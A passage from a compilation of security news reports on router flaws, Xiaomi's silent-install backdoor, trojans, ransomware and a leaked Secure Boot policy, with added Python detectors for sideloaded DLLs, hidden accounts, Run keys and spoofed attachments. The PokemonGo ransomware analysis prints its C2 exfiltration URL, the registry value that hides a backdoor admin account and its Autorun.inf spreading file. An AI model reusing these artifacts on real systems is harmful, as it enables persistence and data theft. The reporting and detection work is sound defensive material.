A default, hardcoded Wi-Fi Protected Setup (WPS) PIN, as well as a weak WPS PIN generation algorithm
Multiple vulnerabilities in the HTTP daemon
Hardcoded remote Firmware Over The Air credentials
Lowered security in Universal Plug and Play, and more.

"At best, the vulnerabilities are due to incompetence; at worst, it is a deliberate act of security sabotage from the vendor," says Kim, and advises users to stop using the device until adequate fixes are provided.

"As the router has a sizable memory (168 MB), a decent CPU and good free space (235 MB) with complete toolkits installed by default (sshd, proxy, tcpdump ...), I advise users to trash their routers because it's trivial for an attacker to use this router as an attack vector (i.e. hosting a sniffing tool, LAN hacking, active MiTM tool, spamming zombie)," he noted.

The router is still being sold and used around the world.

Article source
  11. Xiaomi Can Silently Install Any App On Your Android Phone Using A Backdoor

Do you own an Android smartphone from Xiaomi, HTC, Samsung, or OnePlus? If yes, then you must be aware that almost all smartphone manufacturers ship their own customised Android builds (Xiaomi's MIUI, for example), much as community ROMs such as CyanogenMod and Paranoid Android do, with pre-loaded themes and applications meant to improve the device's performance. But do you have any idea what pre-installed apps and services your manufacturer has put on your device, what their purpose is, and whether they pose any threat to your security or privacy?

With the same curiosity to find answers to these questions, a computer science student and security enthusiast from the Netherlands who owns a Xiaomi Mi4 smartphone started investigating the purpose of a mysterious pre-installed app, dubbed AnalyticsCore.apk, that runs 24x7 in the background and reappears even if you delete it.

Xiaomi is one of the world's largest smartphone manufacturers, and has previously been criticized for spreading malware, shipping handsets with pre-loaded spyware/adware and a forked version of Android, and secretly sending users' data off the device without their permission.

Xiaomi Can Silently Install Any App On your Device

After asking about the purpose of the AnalyticsCore app on the company's support forum and getting no response, Thijs Broenink reverse engineered the code and found that the app checks for a new update from the company's official server every 24 hours. With each request the app sends device identification information, including the phone's IMEI, model, MAC address, a nonce, the package name and its signature. If an updated app is available on the server with the filename "Analytics.apk", it is automatically downloaded and installed in the background without user interaction.

Now the question is: does your phone verify the correctness of the APK, and does it make sure that it is actually an Analytics app?
Broenink found that there is no validation at all of which APK gets installed on the user's phone, which means there is a way for attackers to exploit this loophole. It also means Xiaomi can remotely and silently install any application on your device just by renaming it to "Analytics.apk" and hosting it on the server.

Hackers Can Also Exploit This Backdoor

Since the researcher could not find the actual purpose of the AnalyticsCore app, either by searching the web or on the company's website, it is hard to say why Xiaomi has kept this mysterious "backdoor" on its millions of devices.

As I previously said: there is no such thing as a backdoor that only its creator can access. So what if hackers or an intelligence agency figure out how to exploit this backdoor to silently push malware onto millions of Xiaomi devices within just 24 hours?

Worse, the device connects and receives updates over a plain HTTP connection, exposing the whole process to man-in-the-middle attacks: with no validation of the downloaded file, anyone on the network path can substitute their own "Analytics.apk" for Xiaomi's.

Even on the Xiaomi discussion forum, multiple users have raised concerns about the existence of this mysterious APK and its purpose.

How to Block Secret Installation?

As a temporary workaround, Xiaomi users can block all connections to Xiaomi-related domains using a firewall app.

No one from the Xiaomi team has yet commented on its forum about the question raised by Broenink. We'll update the story as soon as we hear from the company. Meanwhile, if you are a Xiaomi user and have experienced anything fishy on your device, hit the comments below and let us know.

Source
  12. Trojan can steal passwords, log keystrokes

Two spam email samples spreading the new trojan

Bitdefender security researchers say they've uncovered a spam flood spreading booby-trapped Microsoft Publisher (PUB) files laced with a new trojan that opens a backdoor on infected computers.

The company says it detected a few thousand of these emails in a short period, all with .pub files attached. The spam claimed to come from various brands in the UK and China and tried to pass itself off as orders and invoices.

PUB file -> VBScript -> AutoIt script -> Backdoor Trojan

The attached PUB file, when opened, triggers a VBScript that downloads a self-extracting cabinet (CAB) file onto the user's PC. This file contains an AutoIt script, the interpreter needed to run it, and a file encrypted with AES-256. Bitdefender's team noticed that a string from the AutoIt script serves as the decryption key for the latter file. The decrypted file is the backdoor trojan that lets the crooks connect to the infected PC.

Trojan can log keystrokes, steal passwords

The trojan can also log keystrokes, record passwords as they're typed into login forms, dump passwords from browsers and email clients, gather information about the infected system, and more.

Bitdefender's team hasn't named the malware, which is currently detected only as Generic.Malware.SFLl.545292C. The PUB files spreading the trojan are detected as W97M.Downloader.EGF.

What's unusual about this distribution campaign is the use of PUB files, specific to Microsoft's Publisher application, one of the apps included in the Office 365 suite.

".pub is not your typical file format to host malware," Adrian Miron, Head of Antispam Lab at Bitdefender, says. "Spammers have chosen it because people don't usually associate this type of file with the possibility of infection."

Article source
  13. FBI Director Wants 'Adult Conversation' About Backdooring Encryption

Coast's clear, boss, no encryption here ... FBI Director James Comey, center

How about f**k off – is that adult enough?

FBI Director James Comey is gathering evidence so that in 2017 America can have an "adult" conversation about breaking encryption to make crimefighters' lives easier.

Speaking at Tuesday's 2016 Symantec Government Symposium in Washington, Comey banged on about his obsession with strong cryptography causing criminals to "go dark" and making themselves harder to catch. Comey said that once the election cycle is over, he will resume his push to force technology companies to bork their own products, this time armed with plenty of supporting documentation.

"The conversation we've been trying to have about this has dipped below public consciousness now, and that's fine. Because what we want to do is collect information this year so that next year we can have an adult conversation in this country," he said, AP reports.

"We want to lock some people up, so that we send a message that it's not a freebie to kick in the door, metaphorically, of an American company or private citizen and steal what matters to them. And if we can't lock people up, we want to call (them) out. We want to name and shame through indictments, or sanctions, or public relation campaigns – who is doing this and exactly what they're doing."

Americans do have the right to a measure of privacy in their own homes, cars, or on their electronic devices, he said. But the government also has the right to invade that privacy when law enforcement feels it has probable cause.

Comey referenced the Apple case, in which the FBI tried to force Tim Cook's company to build a version of iOS that could bypass the security systems of an iPhone used by one of the San Bernardino terrorists. The FBI backed down after a third party proved able to get into the handset, and nothing of note was found on it.
But Comey isn't giving up in his quest to introduce a backdoor into encryption systems, or a front door as he prefers to call it. This despite the NSA and the best minds in the crypto business pointing out that nobody knows how to build such an access mechanism in a way that keeps it from being found and exploited by others.

Comey, and others, seem to think that it is possible, despite offering no evidence to support this view. Instead they want to force the technology industry to invent a way to make it possible for them to defeat encryption.

Even supposing such a system were possible and police got a golden key to crypto, there's no guarantee that the key wouldn't leak. As we saw with the Microsoft Secure Boot fiasco, even the most sensitive golden keys can leak, and a method to break all American crypto systems would be top of the wish list for criminals and foreign powers.

Comey's argument is also predicated on the assumption that criminals will only use American crypto systems. At the last count, two-thirds of the crypto systems out there come from outside the Land of the Free™ and so would be unaffected.

US tech firms are, of course, very worried about law enforcement's plans. If implemented, any backdoor would kill their sales, both domestically and internationally. American technology sales have already suffered post-Snowden, and selling broken crypto would accelerate this decline.

Source
  14. Backdoor Trojan Uses TeamViewer Components to Spy on PCs in Europe, Russia, US

Crooks also delivering keyloggers and password stealers

The concept is not new by any means: crooks have employed TeamViewer in the past, packaging the legitimate app alongside their malware and using it to turn the user's PC into a web proxy. That particular trojan, BackDoor.TeamViewer.49, did not allow the crooks to steal anything, only to spy on traffic, but this newer variant does, according to Dr.Web security researchers.

In fact, the two variants seem to be related, because they both use stripped-down versions of the TeamViewer application in which the avicap32.dll file is replaced with a malicious version that loads the trojan's functionality.

Trojan includes many self-defense mechanisms

The infection process revolves around users installing applications that bundle the stripped-down TeamViewer version, which is installed without their knowledge. Whenever this modified TeamViewer starts, it loads avicap32.dll, a DLL the application requires; because Windows searches the application's own directory before the system directory, the planted copy sitting next to the executable is the one that gets loaded.

Crooks modified this DLL to include the BackDoor.TeamViewerENT trojan, which is unpacked straight into memory: the backdoor itself never exists as a separate file on disk, which makes antivirus detection harder.

The modified DLL also contains functions to suppress any TeamViewer error messages, so the user is not alerted to the trojan's presence. Another odd feature is that whenever the user starts Windows Task Manager or Process Explorer, the trojan shuts down its parent TeamViewer process to avoid being seen in the process list.

Backdoor trojan includes lots of RAT-looking features

After this, BackDoor.TeamViewerENT.1 behaves like a regular backdoor. It communicates with its C&C server, from which it receives various types of commands.
The trojan can restart or turn off the computer, remove or relaunch its parent TeamViewer process, listen to conversations via the microphone, access the webcam, download and execute files, run command-line instructions, or connect to specified remote servers. As you can see, these are full-on RAT features.

Additionally, Dr.Web says it detected a campaign in which crooks used the trojan to download and install other malware such as keyloggers and password stealers.

During their investigation, security researchers found the trojan was very active, especially targeting Russian users, but also users in the UK, Spain, and the US. Attackers switched focus to US targets in August, says the security vendor. Some of this trojan's other names are Spy-Agent, TVSPY, TVRAT, and Teamspy.

Last week, Kaspersky reported that the criminal group delivering the Shade ransomware had also integrated this trojan into its distribution channel. Crooks were using it to spy on infected machines and see if they were valuable targets. Kaspersky says the crooks specifically focused on accounting departments at Russian-speaking companies.

TeamViewer, which is a legitimate application, is not the only application abused by cyber-criminals in the past month. The same happened to LogMeIn, another remote desktop utility, which crooks used together with the PosCardStealer PoS malware. The criminal group was hacking into computers that had LogMeIn installed and leaving their PoS malware behind.

Source
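The planted avicap32.dll is detectable from a module list alone: Windows ships that DLL in System32, so a copy loaded from an application folder has been sideloaded. The Python below is an added example written for this page, not Dr.Web's tooling. The module list is constructed in the shape you would get from Sysinternals ListDLLs or `tasklist /m` (process name, PID, full module path), and the set of system DLL names is a small hand-written stand-in for a real listing of C:\Windows\System32; on a real host you would build it with os.listdir.

```python
import ntpath

# Directories from which Windows system DLLs are legitimately loaded.
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

# Names of DLLs that ship with Windows. Constructed subset for the demo;
# on a real host build it from os.listdir(r"C:\Windows\System32").
SYSTEM_DLL_NAMES = {"avicap32.dll", "kernel32.dll", "user32.dll",
                    "version.dll", "wininet.dll"}

# Constructed module list (process, pid, module path); not real capture data.
SAMPLE_MODULES = [
    ("TeamViewer.exe", 4120, r"C:\Users\alice\AppData\Roaming\TV\TeamViewer.exe"),
    ("TeamViewer.exe", 4120, r"C:\Users\alice\AppData\Roaming\TV\avicap32.dll"),
    ("TeamViewer.exe", 4120, r"C:\Windows\System32\kernel32.dll"),
    ("VideoApp.exe",   2231, r"C:\Windows\System32\avicap32.dll"),
    ("VideoApp.exe",   2231, r"C:\Program Files\VideoApp\videoapp_codecs.dll"),
]


def find_sideloaded_dlls(modules, system_dll_names=SYSTEM_DLL_NAMES,
                         system_dirs=SYSTEM_DIRS):
    """Flag any DLL that carries a Windows system DLL's name but was loaded
    from outside the system directories. That is the footprint of DLL
    search-order hijacking: a same-named file next to the EXE shadows the
    genuine library, exactly what the modified avicap32.dll does."""
    hits = []
    for proc, pid, path in modules:
        name = ntpath.basename(path).lower()
        folder = ntpath.dirname(path).lower()
        if name in system_dll_names and folder not in system_dirs:
            hits.append({"process": proc, "pid": pid, "dll": path})
    return hits


if __name__ == "__main__":
    for hit in find_sideloaded_dlls(SAMPLE_MODULES):
        print(f"{hit['process']} (pid {hit['pid']}) loaded {hit['dll']}")
```

VideoApp.exe loading avicap32.dll from System32 is what a genuine webcam-capable program looks like and is not reported; a third-party DLL with its own name in Program Files is not reported either, since the check keys on Windows' own DLL names rather than on every module outside System32.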
  15. With the popularity of PokemonGo, it was inevitable that a malware developer would create ransomware that impersonates it. This is the case with a new Hidden Tear-based ransomware discovered by Michael Gillespie that impersonates a PokemonGo application for Windows and targets Arabic-speaking victims.

PokemonGo Ransomware Icon

At first glance, the PokemonGo ransomware infection looks like any other generic ransomware infection. It scans a victim's drives for files with the following extensions:

.txt, .rtf, .doc, .pdf, .mht, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .jpg, .png, .csv, .sql, .mdb, .sln, .php, .asp, .aspx, .html, .xml, .psd, .htm, .gif

When it encrypts a file it uses AES encryption and appends the .locked extension to the encrypted file. When done, it displays a ransom note telling the victim to contact [email protected] for payment instructions.

On closer inspection, it is apparent that this developer has put in extra time to include features that are not found in many, if any, other ransomware variants. These include adding a backdoor Windows account, spreading the executable to other drives, and creating network shares. It also appears that the developer isn't done yet, as the source code contains many indications that this is a development version.

New features found in the PokemonGo Ransomware

Most ransomware infections encrypt your data, delete themselves, and then display a ransom note. The malware developers are there to do one thing: encrypt your files so that you pay the ransom. With that said, most ransomware does not want to leave any traces behind other than the ransom notes.

The PokemonGo ransomware acts a little differently, as it creates a backdoor account in Windows so that the developer can gain access to a victim's computer at a later date. When installed, the PokemonGo Ransomware creates a user account called Hack3r and adds it to the Administrators group.
Hack3r Account

It then hides this account from the Windows login screen by setting the following registry value:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList "Hack3r" = 0

Another feature is a function that creates a network share on the victim's computer. It is currently unknown what this share would be used for, as most shares would be blocked by a victim's router or firewall. This function is not currently called by the program.

Create Share Code

Last, but not least, the ransomware attempts to spread itself by copying its executable to all removable drives. It then creates an Autorun.inf file so that the ransomware runs every time someone inserts that removable drive into a computer. The contents of the Autorun.inf file are:

[AutoRun]
OPEN=PokemonGo.exe
ICON=PokemonGo.exe

It also copies the executable to the root of any fixed disk other than the C: drive and sets an autorun entry called PokemonGo to start it when a user logs into Windows.

The PokemonGo Ransomware is still in Development

There are numerous indications that this ransomware is still in development. First, the ransomware uses a static AES key of 123vivalalgerie, which in principle means files encrypted by this build can be recovered without paying. It is assumed that when this ransomware goes live, it will generate a random key and upload it to the Command & Control server.

Another clue that it is still in development is that the hard-coded C2 server uses an IP address from a range reserved for private networks, so there is no way to reach it over the Internet:

private string targetURL = "http://10.25.0.169/PokemonGo/write.php?info=";

This too will change when the ransomware is finally released. Finally, the CreateShare function is present in the program but is not actually called at this time.

The PokemonGo Ransomware Targets Arabic Victims

This ransomware targets Arabic-speaking victims, judging by the ransom notes and screensaver created by the program.
When the ransomware has finished encrypting the files on a computer it creates a ransom note on the Windows desktop called هام جدا.txt, which translates to "Very important.txt". The content of this ransom note is:

(: لقد تم تشفير ملفاتكم، لفك الشفرة فلكسي موبيليس للعنوان التالي [email protected] وشكرا على كرمكم مسبقا

The English translation is:

( : Your files have been encrypted , decoding Falaksa Mobilis following address [email protected] and thank you in advance for your generosity

Finally, when the ransomware is installed it extracts a resource embedded in the main ransomware executable and saves it in the victim's Startup folder. This resource is another executable that is configured to start automatically when the victim logs into Windows. Once started, it displays a screensaver showing Pikachu and another ransom note in Arabic.

Screensaver Ransom Note

An interesting resource embedded in the screensaver executable is an image (shown below) with the name Sans Titre. This phrase is French, rather than Arabic, and means Untitled. Could this be a clue to the origin of the developer?

Sans Titre Image

Files Associated with the PokemonGo Ransomware:

%UserProfile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\[random].exe
PokemonGo.exe

Registry Entries associated with the PokemonGo Ransomware:

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "PokemonGo"

Article source
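The three persistence artifacts described above (the hidden Hack3r account, the Run entry and the Autorun.inf dropped on removable drives) can be checked from a registry export and a drive root without running the sample. The Python below is an added example written for this page, not Michael Gillespie's or BleepingComputer's code: it parses a constructed `reg export`-style dump and a constructed Autorun.inf, and the "trusted directory" heuristic used to rank Run entries (anything launched from outside Program Files or Windows is reported) is an assumption of the example, not something the article states.

```python
import re

USERLIST_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
                r"\Winlogon\SpecialAccounts\UserList")
RUN_KEYS = (r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
            r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
# Heuristic (example's own assumption): Run entries launched from these
# locations are treated as normal; anything else is reported for review.
TRUSTED_PREFIXES = (r"c:\program files", r"c:\windows")

# Constructed .reg-style export, as produced by `reg export`; not real data.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"Hack3r"=dword:00000000

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"PokemonGo"="C:\\Users\\victim\\PokemonGo.exe"
"Example Agent"="\"C:\\Program Files\\Example\\agent.exe\" /tray"
'''

# Constructed Autorun.inf with the same shape as the one the article shows.
SAMPLE_AUTORUN = """\
[AutoRun]
OPEN=PokemonGo.exe
ICON=PokemonGo.exe
"""

_VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<val>.*)$')


def _decode_value(val):
    """Decode the two .reg value encodings this example needs: dword and string."""
    if val.startswith("dword:"):
        return int(val[6:], 16)
    if val.startswith('"') and val.endswith('"'):
        return val[1:-1].replace("\\\\", "\\").replace('\\"', '"')
    return val


def parse_reg_export(text):
    """Minimal parser for .reg exports: {key path: {value name: value}}."""
    data, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            data.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            data[current][m["name"]] = _decode_value(m["val"])
    return data


def _exe_from_command(cmd):
    """First token of a Run command line, honouring a quoted path."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        return cmd[1:].split('"', 1)[0]
    return cmd.split(" ", 1)[0]


def find_persistence(reg):
    """Report hidden accounts (UserList value 0) and Run entries that start
    something from outside the trusted program directories."""
    findings = []
    for account, shown in reg.get(USERLIST_KEY, {}).items():
        if shown == 0:
            findings.append(("hidden_account", account))
    for key in RUN_KEYS:
        for name, cmd in reg.get(key, {}).items():
            exe = _exe_from_command(cmd)
            if not exe.lower().startswith(TRUSTED_PREFIXES):
                findings.append(("run_key_outside_trusted_dirs", f"{name} -> {exe}"))
    return findings


def autorun_launch_target(text):
    """Return what an Autorun.inf's [AutoRun] OPEN= line would launch, or None."""
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_section = line.lower() == "[autorun]"
        elif in_section and line.lower().startswith("open="):
            return line.split("=", 1)[1].strip()
    return None


if __name__ == "__main__":
    for kind, detail in find_persistence(parse_reg_export(SAMPLE_REG)):
        print(f"{kind}: {detail}")
    print("autorun launches:", autorun_launch_target(SAMPLE_AUTORUN))
```

A UserList value of 0 is the exact setting the article quotes, so it is reported outright; the Run-key rule is deliberately a heuristic, since legitimate software does sometimes autostart from a user profile and a reviewer should expect some noise from it.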
  16. The trojan downloader Nemucod is back with a new campaign. This time, however, it has changed the payload served to its victims: ransomware is no longer its go-to malware. Currently the "weapon of choice" is a backdoor detected by ESET as Win32/Kovter, in this instance mainly focusing on ad-clicking.

As a backdoor, this trojan allows the attacker to control the machine remotely without the victim's consent or knowledge. The currently used variant can perform four main activities:

1. Download and run a file,
2. Gather various information and send it to a C&C server,
3. Store its own configuration data in Windows Registry entries, and
4. Control its own "click-function".

In the recently observed wave, malware operators are mainly focusing on the ad-clicking capability delivered via an embedded browser. The trojan can activate as many as 30 separate threads, each visiting websites and clicking on ads. The number of threads can change according to commands from the attacker and can also be altered automatically, since Kovter monitors free memory and CPU usage. This helps the trojan avoid overloading the system and keep a low profile. However, when the computer is idle, the malware may allocate more resources to its activities until further user activity is detected.

When set in Kovter's configuration, it can also check whether the infected machine runs in a controlled or virtual environment and report this fact to the attacker.

To deliver Kovter, the attackers behind the campaign use the Nemucod downloader disguised as an email ZIP attachment. Posing as a fake invoice, the cybercriminals try to convince users to open it, unaware that it contains a malicious JavaScript file. This technique is used to evade detection by some mail scanners and to reach as many victims as possible.
If the user falls for the trap and executes the file, the Nemucod downloader fetches Kovter onto the machine and runs it.

Similar Nemucod campaigns have been around for quite some time. ESET warned the public of the threat in late December 2015 and again in March 2016. However, past waves primarily tried to download ransomware families, most frequently Locky or the now discontinued TeslaCrypt, instead of the current ad-clicking backdoor.

How can you avoid this threat?

If your email client or server offers attachment blocking by extension, you may want to block emails sent with *.EXE, *.BAT, *.CMD, *.SCR and *.JS files attached.
Make sure your operating system displays file extensions. This helps to identify the true type of a file in case of dual-extension spoofing (e.g. "INVOICE.PDF.EXE" is not displayed as "INVOICE.PDF").
If you frequently and legitimately receive this type of file, check who the sender is, and if there is anything suspicious, scan the message and its attachments with a reliable security solution.

Article source
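The attachment-blocking advice above can be turned into a small filter. The Python below is an added example, not ESET's code: it applies the extension blocklist from the article (extended with a few other script types Windows runs on double-click, which is this example's own addition), recognises dual-extension names such as INVOICE.PDF.JS, and looks inside ZIP attachments, since that is where Nemucod actually travels. The sample ZIP is built in memory for the demonstration and its contents are constructed stand-ins, not malware.

```python
import io
import ntpath
import zipfile

# The article's list (.EXE .BAT .CMD .SCR .JS) plus other double-click-executable
# types; the extra entries are this example's addition.
EXEC_EXT = {".exe", ".bat", ".cmd", ".scr", ".js", ".jse", ".vbs", ".vbe",
            ".wsf", ".hta", ".pif", ".com"}
# Document-looking extensions attackers put in front of the real one.
DOC_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}


def classify_filename(name):
    """Return a finding for a risky attachment name, else None.
    'invoice.pdf.js' is reported as a dual-extension spoof, 'setup.exe' as a
    plain executable; everything else passes this check."""
    base = ntpath.basename(name.replace("/", "\\")).lower()
    if "." not in base:
        return None
    stem, ext = base.rsplit(".", 1)
    ext = "." + ext
    if ext not in EXEC_EXT:
        return None
    if "." in stem and "." + stem.rsplit(".", 1)[1] in DOC_EXT:
        return f"dual-extension spoof: {base}"
    return f"executable attachment: {base}"


def scan_attachment(filename, data, depth=0, max_depth=2):
    """Classify an attachment and, if it is a ZIP, every member inside it
    (recursing into nested ZIPs up to max_depth). Returns a list of findings."""
    findings = []
    verdict = classify_filename(filename)
    if verdict:
        findings.append(verdict)
    if depth < max_depth and zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if info.is_dir():
                    continue
                # A production filter would cap info.file_size before reading.
                inner = zf.read(info)
                for f in scan_attachment(info.filename, inner, depth + 1, max_depth):
                    findings.append(f"inside {filename}: {f}")
    return findings


def build_sample_zip():
    """Constructed ZIP resembling a Nemucod lure: a script with a document-looking
    name next to a harmless text file. The contents are placeholders."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("INVOICE.PDF.JS", "// constructed stand-in for a downloader script\n")
        zf.writestr("readme.txt", "constructed benign file\n")
    return buf.getvalue()


if __name__ == "__main__":
    for name, data in [("invoice_2016.zip", build_sample_zip()),
                       ("setup.exe", b"MZ"), ("report.pdf", b"%PDF-1.4")]:
        print(name, "->", scan_attachment(name, data) or "clean")
```

Checking the name inside the archive rather than the archive's own name is the point: a blocklist that only sees "invoice_2016.zip" lets the lure through, which is why the campaign ships its JavaScript zipped.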
  17. Microsoft leaked the golden keys that unlock Windows-powered tablets, phones and other devices sealed by Secure Boot – and is now scrambling to undo the blunder.

These skeleton keys can be used to install non-Redmond operating systems on locked-down computers. In other words, on devices that do not allow you to disable Secure Boot even if you have administrator rights – such as ARM-based Windows RT tablets – it is now possible to sidestep this block and run, say, GNU/Linux or Android.

What's more, it is believed it will be impossible for Microsoft to fully revoke the leaked keys.

And perhaps most importantly: it is a reminder that demands by politicians and crimefighters for special keys, which can be used by investigators to unlock devices in criminal cases, will inevitably jeopardize the security of everyone.

Microsoft's misstep was uncovered by two researchers, MY123 and Slipstream, who documented their findings in a demoscene-themed writeup published on Tuesday. Slip believes Microsoft will find it impossible to undo its leak.

Bringing you up to speed on Secure Boot

Before we delve further, it is important to understand that up until now we've been talking about keys metaphorically: at the heart of this matter are what are called Secure Boot policies. You don't have to completely understand all the ins and outs of Secure Boot to get your head around Microsoft's cockup. However, if you want more details of how Secure Boot works, the Linux Foundation has a guide [PDF] and Microsoft blogged a gentle introduction.

Basically, what you need to know is this: when Secure Boot is fully enabled in the firmware of a Microsoft device, it will only boot up an operating system that is cryptographically signed by Redmond. That stops you from booting up any OS you want on your Windows RT tablet, certain Windows Phones and so on.
Alongside this, there are Secure Boot policies, which are rules that are loaded and obeyed during early startup by the Windows boot manager. These policies must also be signed by Microsoft to be accepted, and are installed on devices and machines using a Microsoft-signed tool.

For debugging purposes, Microsoft created and signed a special Secure Boot policy that disables the operating system signature checks, presumably to allow programmers to boot and test fresh OS builds without having to sign each one. If you provision this magic policy, that is, if you install it into your firmware, the Windows boot manager will not verify that it is booting an official Microsoft-signed operating system. It will boot anything you give it provided it is cryptographically signed, even a self-signed binary – like a shim that loads a Linux kernel.

The Register understands that this debug-mode policy was shipped on retail devices, and discovered by curious minds including Slip and MY123. The policy was effectively deactivated on these products but present nonetheless.

Now that golden policy has leaked onto the internet. It is signed by Microsoft's Windows Production PCA 2011 key. If you provision this onto your device or computer as an active policy, you'll disable Secure Boot. The policy is universal; it is not tied to any particular architecture or device. It works on x86 and ARM, on anything that uses the Windows boot manager.

Microsoft's response

According to the pair of researchers, they contacted Microsoft's security team around March to say they had found the debug-mode policy. Initially, we're told, Redmond declined to follow up the find, then decided about a month later it was a security issue and paid out a bounty reward.

In July, Microsoft pushed out security patch MS16-094 in an attempt to stop people unlocking their Secure Boot-sealed devices.
That added a bunch of policies, including the debug-mode policy, to a revocation list held in the firmware that's checked during startup by the Windows boot manager. That didn't fully kill off the magic policy, however. The revocation list is checked by the boot manager only after policies have been loaded, and by that point in the startup sequence it's too late. A Microsoft tool used to provision the policy into the firmware does check the revocation list, and so refuses to accept the magic policy when you try to install it, but that means MS16-094 acts merely as a minor roadblock.

This week, Microsoft issued patch MS16-100, which revokes more stuff but doesn't affect the golden policy, we're told. A third patch is due to arrive next month as a follow-up.

If you haven't installed the July fix yet, you can use this script to provision the unlock policy onto your ARM-powered Windows RT tablet. You must be an administrator to update the firmware. After that, you can set about trying to boot a non-Windows OS or any other self-signed EFI binary. We're told by one brave tester that this policy installation method worked on a Windows RT tab that was not patched for MS16-094.

The aforementioned script works by running a Microsoft-provided EFI binary during the next reboot that inserts the debug-mode policy into storage space on the motherboard that only the firmware and boot manager are allowed to access.

If you have installed the July update, the above script will fail, because the updated revocation list will be checked by Microsoft's installation tool and the magic policy will be rejected before it can be provisioned. In about a week's time, MY123 is expected to release a package that will work around this and install the debug-mode policy on all devices, including Windows RT tablets.

People are particularly keen to unlock their ARM-powered Surface fondleslabs and install a new operating system because Microsoft has all but abandoned the platform.
Windows RT is essentially Windows 8.x ported to 32-bit ARMv7-compatible processors, and Microsoft has stopped developing it. Mainstream support for Surface RT tabs runs out in 2017 and for Windows RT 8.1 in 2018.

A policy similar to the leaked debug-mode policy can be used to unlock Windows Phone handsets, too, so alternative operating systems can be installed. A policy provision tool for Windows Phone is already available. We expect to hear more about that soon.

This Secure Boot misstep also affects Windows PCs and servers, but it's not that big a deal for them because these machines are typically unlocked anyway. You can boot your unrestricted computer into its firmware settings and switch off Secure Boot, or delete all the keys from its database to disable it, if you really want to. You don't need any debug-mode tricks to do that.

In the unlikely event you're using a locked-down Secure Boot PC and you have admin rights on the box, and you want to boot something else, all the above is going to be of interest to you. If you're an IT admin who is relying on Secure Boot to prevent the loading of unsigned binaries and drivers – such as rootkits and bootkits – then all the above is going to worry you.

FBI and golden keys

To reiterate, these Microsoft-signed resources – the debug-mode policy and the EFI installation tool – are only meant to be used by developers debugging drivers and other low-level operating system code. In the hands of Windows RT slab owners, whose devices are completely locked down, they become surprisingly powerful.

It's akin to giving special secret keys to the police and the Feds that grant investigators full access to people's devices and computer systems. Such backdoor keys can and most probably will fall into the wrong hands: rather than be used exclusively for fighting crime, they will be found and exploited by criminals to compromise communications and swipe sensitive personal information.
Anyone who thinks government servers holding these keys are safe need only be reminded of the OPM megahack; anyone who thinks these keys cannot be extracted from software or hardware need only spend a weekend with a determined reverse-engineer and a copy of IDA Pro.

The Secure Boot policies Microsoft is rushing to revoke can't be used to backdoor conversations or remotely hijack systems, but they remind us that this kind of information rarely stays secret.

"This is a perfect real world example about why your idea of backdooring cryptosystems with a 'secure golden key' is very bad," Slipstream wrote, addressing the FBI in particular. "Smarter people than me have been telling this to you for so long. It seems you have your fingers in your ears. You seriously don't understand still? Microsoft implemented a 'secure golden key' system. And the golden keys got released by Microsoft's own stupidity. Now, what happens if you tell everyone to make a 'secure golden key' system?"

We asked Microsoft for comment, and a spokesperson was not immediately available.

Article source
18. Ransomware on the Linux Platform

Times are changing when it comes to Linux malware. For a long time we have had backdoors, PHP shells, and even rootkits. But it won't be long before ransomware catches up on the Linux platform. We hope you are reading this to counter the threat, not because it is already too late.

Ransomware Invasion

Ransomware is a little devil. It encrypts your valuable data and protects it with a generated key. This key is then forwarded to the maker of the ransomware, and then it is safeguarded. The key is released upon payment, together with a decryption utility. And surprisingly, the bad guys will deliver each time. This way they know people will keep paying for ransomware intrusions.

The sudden spike in ransomware is most likely caused by different factors. In other words, each individual factor was an existing technology. Combined they make a good recipe for evildoers. There is also the increase in data, which companies now consider one of their biggest assets. The spread of internet technology and lowering prices helped. And if you add Bitcoin into the mix, you have anonymous payments. This combination makes it ideal to infect people, encrypt their precious data, and finally ask them to pay in Bitcoins.

Why Linux?

In every market where there is money to be made, there will be more competition over time. Until there is a point that everyone has to drop prices, or go out of business (or both). The Microsoft Windows platform already had its fierce competition. Now macOS and Linux are next.

A proof of concept (PoC) is already available for Linux. It is called BashCrypt and comes with everything you need to set up a ransomware infrastructure. It includes the code you have to run on the intruded system and also the code for the server side, to receive status updates and payments.
BashCrypt asking a victim to pay (proof of concept)

Defending Against Ransomware

Staying clean of ransomware is hard, especially if there are many people working in your company. We all (should) know by now that you don't open up strange attachments. But it still happens. User awareness is key and it is something we will have to keep doing.

If you have a Linux server which acts as a mail server for your environment, then it makes sense to test some ransomware samples and see if they are detected by the existing anti-virus solution. If not, that is a first place to improve. You might want to make the jump from free open source anti-virus like ClamAV, and add a second scanner on top of it.

In the event you become a victim of ransomware, you have two options: pay, or restore. Giving money to bad guys is actually a bad thing to do. It keeps financing them, resulting in an increase of ransomware. Better is to restore your data. So make sure you have good backups, and check them regularly. Why wait? Do check it now and see if you can restore some of your most important data.

Article source
19. Backdoor Account Found in Dell Network Security Products

Dell SonicWall equipment came with a hidden account

